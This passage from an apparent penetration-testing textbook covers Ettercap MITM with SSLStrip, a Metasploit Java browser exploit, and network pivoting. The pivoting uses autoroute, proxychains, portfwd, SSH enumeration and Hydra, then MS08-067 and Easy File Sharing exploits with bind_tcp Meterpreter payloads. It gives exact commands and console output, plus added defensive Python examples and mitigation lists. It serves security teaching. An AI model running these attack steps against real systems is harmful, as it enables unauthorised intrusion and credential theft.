Figure 8.22: testphp.vulnweb.com website 


Enter username test and password test. 


16. Check victim traffic in Wireshark, as shown in Figure 8.23: 


Figure 8.23: Sniffing victim traffic 


We used the HTTP protocol in this example, but in the real world, the HTTPS protocol is used to secure communication. In this case, as an attacker, what would you do? The attacker will apply the SSLStrip concept, as shown in Figure 8.24, where SSLStrip is a type of MITM attack that forces users to communicate using the HTTP protocol instead of HTTPS, so that the attacker can view all the would-be SSL traffic in plain text. HTTP Strict Transport Security (HSTS) is a security protection mechanism that protects you from this kind of threat: 


HTTP (plaintext) between Victim and Adversary, HTTPS (encrypted) beyond the Adversary 


Figure 8.24: SSLStrip concept 


To use the SSLStrip concept, we will activate the SSLStrip plugin in the Ettercap program. On the menu bar, click Plugins, then Manage the plugins, then double-click on the sslstrip plugin. There is a (*) sign on the left side once it is active, as shown in Figure 8.25: 


Figure 8.25: SSLStrip plugin 


Congratulations! You have successfully conducted a full MITM attack. 
To stop the attack, select Stop sniffing, as shown in Figure 8.26: 


Figure 8.26: Stop sniffing 


Ettercap will transmit an ARP packet after terminating the attack, and the network will revert to normal in a few minutes. Use ARP detection tools like XArp or Snort to protect yourself from such attacks. Assigning static ARP entries can also help prevent an attack: a static entry tells the system that the MAC address of the router is fixed and cannot be modified, so all ARP packets supplied by the attacker will be ignored. 
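An added Python example (not from the book) of the detection that the XArp/Snort advice above relies on: it replays ARP records and alerts when a static entry is contradicted, when a reply arrives that nobody requested, or when one MAC answers for both the router and the victim. The record format and all addresses are constructed.

```python
"""ARP-spoofing detector of the kind XArp or Snort's arpspoof preprocessor
provide, run over constructed ARP traffic.

Added example, not from the book. Static entries for the gateway are the
trusted baseline (the mitigation named above); the record format and every
address below are constructed.
"""
from collections import defaultdict
from typing import Dict, List, Tuple


class ArpMonitor:
    """Tracks IP-to-MAC bindings and raises alerts on the three classic signs
    of ARP poisoning: a trusted binding changing, a reply nobody asked for,
    and one MAC answering for several IPs (router and victim at once)."""

    def __init__(self, static_entries: Dict[str, str]) -> None:
        self.static = {ip: mac.lower() for ip, mac in static_entries.items()}
        self.table: Dict[str, str] = dict(self.static)      # learned bindings
        self.pending: set = set()                            # IPs we asked about
        self.ips_by_mac: Dict[str, set] = defaultdict(set)
        self.alerts: List[Tuple[int, str, str]] = []

    def _alert(self, seq: int, kind: str, detail: str) -> None:
        self.alerts.append((seq, kind, detail))

    def process(self, line: str) -> None:
        """Consume one record: '<seq> <request|reply> <sender_ip> <sender_mac> <target_ip>'."""
        seq_s, op, sender_ip, sender_mac, target_ip = line.split()
        seq, sender_mac = int(seq_s), sender_mac.lower()
        if op == "request":
            self.pending.add(target_ip)   # a reply for target_ip is now legitimate
            return
        if op != "reply":
            raise ValueError(f"unknown ARP op {op!r} in record {seq}")

        # Rule 1: a reply that contradicts a static entry is the strongest signal.
        if sender_ip in self.static and self.static[sender_ip] != sender_mac:
            self._alert(seq, "static-violation",
                        f"{sender_ip} claimed by {sender_mac}, static entry says "
                        f"{self.static[sender_ip]}")
        elif self.table.get(sender_ip, sender_mac) != sender_mac:
            self._alert(seq, "binding-changed",
                        f"{sender_ip} moved from {self.table[sender_ip]} to {sender_mac}")

        # Rule 2: replies nobody requested are how poisoning is usually delivered.
        if sender_ip in self.pending:
            self.pending.discard(sender_ip)
        else:
            self._alert(seq, "unsolicited-reply", f"no request outstanding for {sender_ip}")

        # Rule 3: one MAC posing as more than one IP.
        self.ips_by_mac[sender_mac].add(sender_ip)
        if len(self.ips_by_mac[sender_mac]) > 1:
            self._alert(seq, "mac-claims-multiple",
                        f"{sender_mac} answers for {sorted(self.ips_by_mac[sender_mac])}")

        if sender_ip not in self.static:      # never let traffic overwrite a static entry
            self.table[sender_ip] = sender_mac


def run_monitor(log: str, static_entries: Dict[str, str]) -> List[Tuple[int, str, str]]:
    """Feed every record of a log to a fresh monitor and return its alerts."""
    mon = ArpMonitor(static_entries)
    for line in log.strip().splitlines():
        mon.process(line)
    return mon.alerts


# Constructed trace: the victim asks for the gateway, the gateway answers,
# then a third MAC answers for both the gateway and the victim.
SAMPLE_ARP_LOG = """
1 request 192.168.1.3 00:11:22:33:44:03 192.168.1.1
2 reply   192.168.1.1 00:11:22:33:44:01 192.168.1.3
3 reply   192.168.1.1 02:00:00:aa:bb:cc 192.168.1.3
4 reply   192.168.1.3 02:00:00:aa:bb:cc 192.168.1.1
"""
STATIC = {"192.168.1.1": "00:11:22:33:44:01"}   # gateway pinned, as the text advises

if __name__ == "__main__":
    for seq, kind, detail in run_monitor(SAMPLE_ARP_LOG, STATIC):
        print(f"record {seq}: {kind}: {detail}")
```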


Metasploit 


For penetration testers and IDS developers, Metasploit is the most well-known open-source tool. 
The Metasploit framework is a security exploit and script database. It is one of the most widely 
used open-source tools for writing and running exploit code on target systems. 


We will use a Java vulnerability to hack Windows 7 in the next demonstration. This vulnerability 
will allow the attacker to collect system information or hashdump, take a picture from a 
Webcam, give administrator access, construct and launch executables, create backdoors, and so 
on. Let us get started! 


1. Open a terminal and type msfconsole, as shown in Figure 8.27: 


Figure 8.27: msfconsole command 


2. Now, type search java_jre17_provider_skeleton, as shown in Figure 8.28: 


Figure 8.28: Search the command 


3. Then type use exploit/multi/browser/java_jre17_provider_skeleton, as shown in Figure 8.29: 


Figure 8.29: Use the command 


4. Now, type show options, as shown in Figure 8.30: 


Figure 8.30: Show options command 


5. Let us configure three module options: SRVHOST, SRVPORT, and URIPATH, as shown in Figure 8.31: 
set SRVHOST 192.168.1.128 
set URIPATH / 


Figure 8.31: Set command 


Replace SRVHOST (192.168.1.128) with your Kali Linux IP address. 


6. Now, let us start the exploit, as shown in Figure 8.32: 


Figure 8.32: Exploit command 


7. Now, let us go to the Windows 7 machine (the victim) and, from Internet Explorer, browse to our Kali machine, as shown in Figure 8.33: 


Figure 8.33: Windows 7 machine 


Just leave the browser there. Then, in the Metasploit console, you will see the output shown in Figure 8.34: 


Figure 8.34: Metasploit Console 7 


8. At this point, you will see a session connected to the Windows 7 Machine, as shown in 
Figure 8.35: 


Figure 8.35: Interactive shell on Windows 7 machine 


9. To connect to the session, run the session command and check the system info, as shown in Figure 8.36: 


Figure 8.36: Session 1 command 


10. Now, let us start up a shell and run some commands remotely, as shown in Figure 8.37: 


Figure 8.37: Shell command 


Congratulations! The Windows 7 operating system has been successfully exploited by you. 


Please consider the following to defend yourself from such attacks: 


• Disable Java if you are not going to use it. 
• Increase Java's security level. 
• Allow only trusted sources in Java. 
• Visit only trusted websites and remote servers. 
• Enable Windows Defender or other security software. 
• Use the HTTPS protocol and a VPN to protect from all MITM attacks, so that everything is encrypted. 


Preventions 


A summary of all the preventions addressed in this chapter is as follows: 


• Use SSH or encrypted e-mail for file transfers. 
• Use a VPN when on public networks. 
• Use the HTTPS protocol when on public networks. 
• Use a password manager to log in to websites. 
• Disable Java if you are not going to use it. 
• Increase Java's security level. 
• Allow only trusted sources in Java. 
• Visit only trusted websites and remote servers. 
• Enable Windows Defender or other security software. 
• Download and install software updates. 
• Download and install operating system updates. 


This, once again, is dependent on the user’s computer activity. If the user connects to a public 
network, they may become a target of a MITM attack. A vulnerability attack could be launched 
against a person who is pirating software or movies. 


Conclusion 


The practical demonstrations in this chapter should have opened your eyes and sharpened your sense of security, allowing you to better protect yourself and others from threats. We addressed the following topics in this chapter: 


• How to capture unencrypted traffic with protocols such as HTTP, FTP, and Telnet 
• How to protect yourself using encryption 
• What man-in-the-middle attacks are 
• A demonstration of a man-in-the-middle attack 
• How to protect yourself from man-in-the-middle attacks 
• What Metasploit is 
• A demonstration of Metasploit 
• How to protect yourself from Metasploit attacks 


You will learn how to pivot through a local network to reach other systems and devices in the 
next chapter. We will also be documenting and cleaning up after ourselves. Look forward to 
seeing you in Chapter 9: Wireless Post-Exploitation. 
How to protect yourself from man-in-the-middle attacks? 
What is Metasploit? 
What is SSLStrip? 


CHAPTER 9 
Wireless Post-Exploitation 


Introduction 


Welcome! In the last chapter, we compromised a single network target. So, what happens next, 
you might wonder? The attacker will certainly go further into the network to target internal 
workstations and servers. 


The idea of Defense-in-Depth, which has a significant place in the field of information technology, necessitates the creation of an n-layered security architecture to defend key services. Consider this in terms of corporate networks: vital systems should not be directly reachable from other systems. In this chapter, we will look at how attackers can use pivoting tactics to gain access to hidden networks that are not accessible in the first place. 


Structure 


The following topics will be covered in this chapter: 


• What is routing? 
• What is pivoting? 
• Compromise first pivot and port forwarding 
  o Nmap via pivoting 
  o Port forwarding 
• SSH brute-force over pivoting 
• Gaining access to the second pivot 
• Double pivoting 
• Mitigations 


Objectives 


In this chapter, you will learn how to use first and double pivoting to investigate hidden networks, and the mitigation methods. 


What is routing? 


Routing is the process of defining how devices in various networks communicate with one another. Routing is frequently done with the help of devices known as routers. The routing table is used by the routers to route network packets to their intended destinations. Routing can be done on any computer with an operating system loaded on it, not just network devices like routers. Refer to Figure 9.1: 


Two networks, 192.168.1.0/24 (hosts 192.168.1.4/24 and 192.168.1.7/24) and 192.168.10.0/24 (hosts 192.168.10.4/24 and 192.168.10.7/24), joined by a router 


Figure 9.1: Routing 


According to the example in the previous figure, a routing table record is required to 
communicate successfully between the 192.168.1.0/24 and 192.168.10.0/24 networks. Access 
is made from the 192.168.1.0/24 source to the 192.168.10.0/24 destination according to the 
router’s rule. 


The following is the journey of a network packet: 
1. Is the IP address to be accessed on the local network? 
a. If yes, reach the destination. 
b. If not, send it to the gateway. 


2. The router examines its own routing table after receiving the packet. 
a. Does it have a routing rule in place for the target IP address or network? 
i. If yes, send the packet to the target or the destination. 
ii. If not, send it to the gateway. 


3. Other routers go through a similar procedure. 


4. Finally, the packet reaches the router in charge of the institution's internet exit. The packet is then forwarded to the internet. 
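The four steps above as an added Python example (not from the book): a longest-prefix-match lookup walked hop by hop across a constructed topology that matches Figure 9.1, with 203.0.113.1 standing in for the upstream provider.

```python
"""Packet journey from the four steps above, as a longest-prefix-match lookup.

Added example, not from the book. The router, hosts and routing tables are
constructed to match Figure 9.1 (192.168.1.0/24 and 192.168.10.0/24); the
upstream address 203.0.113.1 is a documentation-range placeholder.
"""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Optional

IPv4 = ipaddress.IPv4Address


@dataclass
class Route:
    prefix: ipaddress.IPv4Network
    next_hop: Optional[IPv4]      # None means directly connected
    interface: str


@dataclass
class Node:
    """A host or a router: its interfaces and its routing table."""
    name: str
    interfaces: Dict[str, ipaddress.IPv4Interface]
    routes: List[Route] = field(default_factory=list)

    def owns(self, ip: IPv4) -> bool:
        return any(i.ip == ip for i in self.interfaces.values())

    def lookup(self, dst: IPv4) -> Optional[Route]:
        """Steps 1 and 2a: the most specific rule that covers dst, if any."""
        matches = [r for r in self.routes if dst in r.prefix]
        return max(matches, key=lambda r: r.prefix.prefixlen, default=None)


def trace(src: Node, dst_ip: str, nodes: Dict[str, Node], max_hops: int = 8) -> List[str]:
    """Names of the nodes the packet visits, ending with the destination host,
    'INTERNET' (a default route left the site) or 'DROP' (no rule matched)."""
    dst = ipaddress.IPv4Address(dst_ip)
    node, path = src, [src.name]
    for _ in range(max_hops):
        if node.owns(dst):
            return path                       # arrived
        route = node.lookup(dst)
        if route is None:
            return path + ["DROP"]            # no rule and no gateway either
        if route.next_hop is None:            # step 1a: destination is on this link
            owner = next((n for n in nodes.values() if n.owns(dst)), None)
            return path + [owner.name if owner else "DROP"]
        nxt = next((n for n in nodes.values() if n.owns(route.next_hop)), None)
        if nxt is None:                       # step 4: hand-off beyond our topology
            return path + ["INTERNET" if route.prefix.prefixlen == 0 else "DROP"]
        path.append(nxt.name)                 # steps 1b / 2a-ii / 3: on to the gateway
        node = nxt
    return path + ["DROP"]                    # loop guard (stands in for TTL)


def _node(name: str, **ifaces: str) -> Node:
    return Node(name, {k: ipaddress.ip_interface(v) for k, v in ifaces.items()})


def build_topology() -> Dict[str, Node]:
    """One router (R1) joins both LANs and holds the site's internet exit."""
    default = ipaddress.ip_network("0.0.0.0/0")
    r1 = _node("R1", eth0="192.168.1.1/24", eth1="192.168.10.1/24", eth2="203.0.113.2/30")
    r1.routes = [Route(i.network, None, name) for name, i in r1.interfaces.items()]
    r1.routes.append(Route(default, ipaddress.IPv4Address("203.0.113.1"), "eth2"))
    hosts = {"A": "192.168.1.4/24", "B": "192.168.1.7/24",
             "C": "192.168.10.4/24", "D": "192.168.10.7/24"}
    nodes = {"R1": r1}
    for name, addr in hosts.items():
        h = _node(name, eth0=addr)
        # Each host's gateway is the router interface sitting on its own LAN.
        gw = next(i.ip for i in r1.interfaces.values() if h.interfaces["eth0"].ip in i.network)
        h.routes = [Route(h.interfaces["eth0"].network, None, "eth0"),
                    Route(default, gw, "eth0")]
        nodes[name] = h
    return nodes


TOPOLOGY = build_topology()

if __name__ == "__main__":
    for src, dst in (("A", "192.168.1.7"), ("A", "192.168.10.4"), ("D", "8.8.8.8")):
        print(f"{src} -> {dst}: {' -> '.join(trace(TOPOLOGY[src], dst, TOPOLOGY))}")
```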


What is pivoting? 


Essentially, it is the practice of leveraging compromised computers to gain access to networks 
that we would not otherwise have access to. If a computer with access to the network is 
compromised, network isolation will be worthless. This approach allows an attacker to get access 
to secret networks by routing to compromised systems. The pivot is used to transfer all requests 
to the newly found network. It is like a kind of tunnel. Refer to Figure 9.2: 


192.168.1.0/24 on one side and the DMZ, 192.168.10.0/24, on the other, with hosts 192.168.1.4/24, 192.168.1.7/24, 192.168.10.4/24 and 192.168.10.7/24 


Figure 9.2: Pivoting 


In this topology, the device with two NICs is connected to both the 192.168.1.0/24 and 
192.168.10.0/24 networks. Unless a routing rule is defined, there is normally no path between 
the two networks. According to the topology, an authorized user working on the computer with 
two NICs needs to reach some services in the DMZ.


Compromising the first pivot and port forwarding 


In our attack scenario, the system named RD, on which a Meterpreter shell has been obtained, is 
also connected to the DMZ network. During information gathering it is discovered that the target 
has two NICs. 


The environment's router does not route between the two networks.


Figure 9.3 illustrates the first pivot: 


Figure 9.3: First pivot (attacker 172.16.0.20 with hosts 172.16.0.15 and 172.16.0.16 on the 172.16.0.0/24 network; RD at 172.16.0.11 holds the Windows Meterpreter session)


Figure 9.4 illustrates the Meterpreter_1: 


Figure 9.4: Meterpreter_1 


Figure 9.5 illustrates the Meterpreter_2: 
Figure 9.5: Meterpreter_2


In our scenario, an attacker who gains access to the RD system will want to reach the network 
behind its second NIC (7.7.7.0/24). To do this, the attacker first needs to define a routing rule 
through RD. 


With Metasploit this is simple: the routing rule is created with the autoroute post module, using 
the current Meterpreter session. Refer to Figure 9.6:


Figure 9.6: Meterpreter_3 


According to the rule just established, the 7.7.7.0/24 network is reachable from within the 
Metasploit framework as long as the Meterpreter session with ID 2 is alive, as shown in Figure 9.7.


The hosts in the hidden network are then discovered with post modules such as arp_scanner. 
Another computer found in the hidden network, 7.7.7.20, is the system named JC.


Refer to Figure 9.7: 


meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 


Figure 9.7: Meterpreter_4


The live hosts in the 7.7.7.0/24 network, including the system named JC, have now been 
identified. Refer to Figure 9.8: 


Figure 9.8: Hidden network (attacker 172.16.0.20 with 172.16.0.15 and 172.16.0.16 on the first network; 7.7.7.20 and 7.7.7.12 discovered in the hidden network)


Naturally, the next question is whether nmap-style scanning tools can be used for this work 
instead of post modules such as arp_scanner.


Nmap via pivoting 


To do so, Metasploit's routing configuration must be active and exposed through a SOCKS4 proxy. 
Another Metasploit module, the socks4a auxiliary server, fulfils this requirement.


The use of the socks4a proxy module can be seen in Figure 9.9: 


Figure 9.9: socks4 proxy (the socks4a module started, with a listener on TCP port 1080 in the LISTEN state)


ProxyChains, a utility for GNU/Linux, forces any TCP connection made by a program through 
Tor or through SOCKS4, SOCKS5 or HTTP/HTTPS proxies. Several proxy servers can be chained in 
this tunneling approach. Besides providing anonymity, it can be used for pivoting, that is, to 
push traffic into newly discovered networks. Refer to Figure 9.10:


Figure 9.10: ProxyChains (a client connecting through a chain of proxy servers 70.248.28.23, 107.155.113.159, 104.28.3.102 and 154.16.127.161; the destination sees the connection as coming from 154.16.127.161)


The details of the newly started socks4 proxy server are added on the last line of 
/etc/proxychains.conf, opened in a text editor. Refer to Figure 9.11:


--- snippet --- 

[ProxyList] 
# add proxy here ... 
# meanwile 
socks4 172.16.0.20 1080 

Figure 9.11: Proxychains.conf file


Running an nmap scan through ProxyChains is then straightforward: the packets are sent to the 
destination through the defined proxy. Refer to Figure 9.12:


root@kali:~# proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script smb-vuln-ms08-067 7.7.7.20 
ProxyChains-3.1 (http://proxychains.sf.net) 

Starting Nmap 7.25BETA1 ( https://nmap.org ) 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK 
|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK 
Nmap scan report for 7.7.7.20 
Host is up (0.17s latency). 

PORT    STATE SERVICE      VERSION 
22/tcp  open  ssh          Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0) 
80/tcp  open  http         Easy File Sharing Web Server httpd 6.9 
135/tcp open  msrpc        Microsoft Windows RPC 
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn 
445/tcp open  microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 


Figure 9.12: Nmap output_1


Also, refer to Figure 9.13: 


Host script results: 
| smb-vuln-ms08-067: 
|   VULNERABLE: 
|   Microsoft Windows system vulnerable to remote code execution (MS08-067) 
|     State: VULNERABLE 
|     IDs:  CVE:CVE-2008-4250 
|       The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, 
|       Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary 
|       code via a crafted RPC request that triggers the overflow during path canonicalization. 
| 
|     Disclosure date: 2008-10-23 
|     References: 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds 
root@kali:~# 


Figure 9.13: Nmap output_2


According to the scan results, SSH and HTTP services are running on the target machine, and the 
SMB service is flagged as vulnerable to MS08-067. Before moving on to exploitation, we will look 
at a different kind of traffic routing called port forwarding.


Port forwarding 


Port forwarding is one of the first steps in pivoting. Certain services on particular systems in 
the hidden network (web servers, and so on) may not be directly accessible from our tools, because 
routing only exists in one direction: we know how to reach the target system and send it a 
request, but the target has no route back to our machine, so a direct connection from a tool 
outside Metasploit cannot complete. Refer to Figure 9.14: 


Figure 9.14: Port forwarding 

As a result, we forward a port on our own system to the destination through the current 
Meterpreter session. The forwarding works as long as that session stays alive.


One thing to keep in mind at this point: the routing added with run autoroute lets us work freely 
inside the Metasploit framework. To reach the target with other Kali tools, we need port 
forwarding or ProxyChains.


Port forwarding can be done with portfwd, a built-in Meterpreter command. Refer to Figure 9.15:


Figure 9.15: Port forward using Metasploit 


ProxyChains and Nmap previously identified a web service on TCP port 80 of 7.7.7.20. To use it, 
we forward local port 2323 to port 80 of 7.7.7.20: when the browser is pointed at port 2323 on 
our own machine, the connection request is carried through the Meterpreter session to port 80 of 
7.7.7.20. Refer to Figure 9.16:


Figure 9.16: Port forward command 


Active rules can be viewed with the portfwd list command. Refer to Figure 9.17: 


meterpreter > portfwd list


Figure 9.17: Portfwd list command 


When the program listening on port 80 of the target 7.7.7.20 is checked through the forwarded 
port, the Easy File Sharing Web Server login page appears. Refer to Figure 9.18: 


Figure 9.18: Easy File Sharing Web Server (login page with username and password fields, reached in the browser through the forwarded port; the footer reads "Powered by Easy File Sharing Web Server, Copyright 2012 EFS Software Inc")
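To show what portfwd does under the hood, here is an added Python example (written for this edit; it is not part of the chapter or of Metasploit): a tiny TCP relay that listens on a local port and copies bytes in both directions to a remote host and port, the same shape as the Meterpreter command portfwd add -l 2323 -p 80 -r 7.7.7.20. Because the hidden host cannot be reached from here, demo() stands up a loopback echo service in place of the 7.7.7.20 web server and pulls a request back through the relay; the ports are chosen by the operating system and the request bytes are constructed.

```python
import socket
import threading


def pump(src, dst):
    """Copy bytes from src to dst until src closes its side, then half-close dst
    so the far end sees end-of-stream, which is how a relay propagates shutdown."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve_forward(listener, remote_host, remote_port, max_conns=1):
    """Accept max_conns clients on listener and relay each to remote_host:remote_port."""
    for _ in range(max_conns):
        client, _ = listener.accept()
        remote = socket.create_connection((remote_host, remote_port))
        threading.Thread(target=pump, args=(client, remote), daemon=True).start()
        threading.Thread(target=pump, args=(remote, client), daemon=True).start()


def start_forwarder(local_port, remote_host, remote_port, max_conns=1):
    """Equivalent of 'portfwd add -l <local_port> -p <remote_port> -r <remote_host>'.
    Binds to loopback only and returns the port actually bound (useful when local_port is 0)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", local_port))
    listener.listen(5)
    threading.Thread(target=serve_forward,
                     args=(listener, remote_host, remote_port, max_conns),
                     daemon=True).start()
    return listener.getsockname()[1]


def _echo_once(listener):
    """Constructed stand-in for the hidden web server: echoes one connection back."""
    conn, _ = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data)


def demo(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Send payload through the relay to the loopback echo service and return the reply.
    With a real pivot the echo service would be 7.7.7.20:80 behind the Meterpreter session."""
    echo = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    echo.bind(("127.0.0.1", 0))
    echo.listen(1)
    echo_port = echo.getsockname()[1]
    threading.Thread(target=_echo_once, args=(echo,), daemon=True).start()

    fwd_port = start_forwarder(0, "127.0.0.1", echo_port)
    with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)  # done sending; wait for the relayed reply
        chunks = []
        while True:
            data = client.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print(demo())
```

The listener is bound to 127.0.0.1 on purpose: a forwarder bound to all interfaces would expose the hidden service to anyone who can reach the attacker's machine, which is the same mistake in reverse that made the pivot possible.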


SSH brute-force over pivoting 


As noted, an SSH service was identified on 7.7.7.20, and a brute-force attack on it is simple to 
carry out. The ssh_enumusers auxiliary module allows user enumeration, as shown in 


Figure 9.19:


msf > use auxiliary/scanner/ssh/ssh_enumusers 
msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20 
rhosts => 7.7.7.20 
msf auxiliary(ssh_enumusers) > set rport 22 
rport => 22 
msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt 
user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt 
msf auxiliary(ssh_enumusers) > run 

[*] 7.7.7.20:22 - SSH - Checking for false positives 
[*] 7.7.7.20:22 - SSH - Starting scan 
[+] 7.7.7.20:22 - SSH - User 'admin' found 
[-] 7.7.7.20:22 - SSH - User 'administrator' not found 
(one found / not found line per username in the wordlist follows) 


Figure 9.19: ssh_enumusers module output_1


Also, refer to Figure 9.20: 


(continuation of the per-username results) 
[-] 7.7.7.20:22 - SSH - User 'login' not found 

[*] Caught interrupt from the console... 
[*] Auxiliary module execution completed 

msf auxiliary(ssh_enumusers) > 


Figure 9.20: ssh_enumusers module output_2


Besides the Metasploit auxiliary modules, Kali tools such as Hydra can be used for the attack. If 
Hydra is run under ProxyChains, all of its traffic is redirected to the target system through the 
compromised system. Refer to Figure 9.21: 
Figure 9.21: Hydra tool in Kali Linux 


An SSH connection is then made through the proxy server to the target system with the username 
admin and the password 123456 obtained during the Hydra brute-force attack. Refer to Figure 9.22: 
Figure 9.22: SSH connection


Gaining access to the second pivot 


Recall that our nmap scan of the 7.7.7.0/24 network range revealed two vulnerabilities on JC: 
MS08-067 and a buffer overflow (BoF) in the Easy File Sharing web server. Either can be used to 
gain access to the target system. Another option is to keep using the SSH access, 


but we will stick with MS08-067 and Easy File Sharing for now.


MS08-067 with bind TCP 


The Metasploit Framework module exploit/windows/smb/ms08_067_netapi compromises the target 
machine by exploiting the MS08-067 vulnerability. The choice of a bind TCP payload is crucial: 
since no routing exists in the reverse direction, the target cannot connect back to us. With a 
bind TCP payload the target instead listens on a port of its own, and after successful 
exploitation we connect to that listening port through the pivot.


Figure 9.23 demonstrates how reverse TCP and bind TCP connections work: 


# Reverse TCP Connection 
ATTACKER 3.3.3.3 -> Step 1: Exploit -> VICTIM 3.3.3.6 
VICTIM 3.3.3.6 -> Step 2: Reverse TCP to 3.3.3.3:6721 -> ATTACKER 


# Bind TCP Connection 
ATTACKER 3.3.3.3 -> Step 1: Exploit -> VICTIM 3.3.3.6 
VICTIM 3.3.3.6: Step 2: Listen 4444 
ATTACKER 3.3.3.3 -> Step 3: Bind TCP to 3.3.3.6:4444 


Figure 9.23: Reverse TCP connection and bind TCP connection


Compromise the victim using the ms08_067_netapi exploit module and the bind TCP payload, 
as shown in Figure 9.24: 


msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi): 

   Name     Current Setting  Required  Description 
   ----     ---------------  --------  ----------- 
   RHOST                     yes       The target address 
   RPORT    445              yes       The SMB service port 
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic Targeting 

msf exploit(ms08_067_netapi) > set rhost 7.7.7.20 
rhost => 7.7.7.20 
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp 


Figure 9.24: ms08_067_netapi exploit output_1


Also, refer to Figure 9.25: 


msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi): 

   Name     Current Setting  Required  Description 
   ----     ---------------  --------  ----------- 
   RHOST    7.7.7.20         yes       The target address 
   RPORT    445              yes       The SMB service port 
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 

Payload options (windows/meterpreter/bind_tcp): 

   Name      Current Setting  Required  Description 
   ----      ---------------  --------  ----------- 
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none) 
   LPORT     4444             yes       The listen port 
   RHOST     7.7.7.20         no        The target address 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic Targeting 


Figure 9.25: ms08_067_netapi exploit output_2


Refer to Figure 9.26: 


msf exploit(ms08_067_netapi) > run 

[*] Started bind handler 
[*] 7.7.7.20:445 - Automatically detecting the target... 
[*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown 
[*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English 
[*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX) 
[*] 7.7.7.20:445 - Attempting to trigger the vulnerability... 
[*] Sending stage (957999 bytes) to 7.7.7.20 
[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) 
meterpreter > 


Figure 9.26: ms08_067_netapi exploit output_3


Easy file share BoF 


The Easy File Sharing application is also vulnerable. The following steps set up its exploit 
module with the bind TCP payload and compromise the target, as shown in Figure 9.27:

msf > use exploit/windows/http/easyfilesharing_seh 
msf exploit(easyfilesharing_seh) > show options 

Module options (exploit/windows/http/easyfilesharing_seh): 

   Name   Current Setting  Required  Description 
   ----   ---------------  --------  ----------- 
   RHOST                   yes       The target address 
   RPORT  80               yes       The target port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Easy File Sharing 7.2 HTTP 

msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20 
rhost => 7.7.7.20 
msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp 


Figure 9.27: Easy File Sharing exploit output_1


Also, refer to Figure 9.28: 


msf exploit(easyfilesharing_seh) > run 

[*] Started bind handler 
[*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... 
[+] 7.7.7.20:80 - Exploit Sent 
[*] Sending stage (957999 bytes) to 7.7.7.20 
[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 <-> 7.7.7.20:4444) at 2016-12-26 14:21:11 +0300 

meterpreter > ipconfig 

Interface 1 
============ 
IPv4 Address : 127.0.0.1 

Interface 2 
============ 
Name         : Intel(R) PRO/1000 MT Desktop Adapter 
Hardware MAC : 08:00:27:29:cd:cb 
MTU          : 1500 
IPv4 Address : 7.7.7.20 
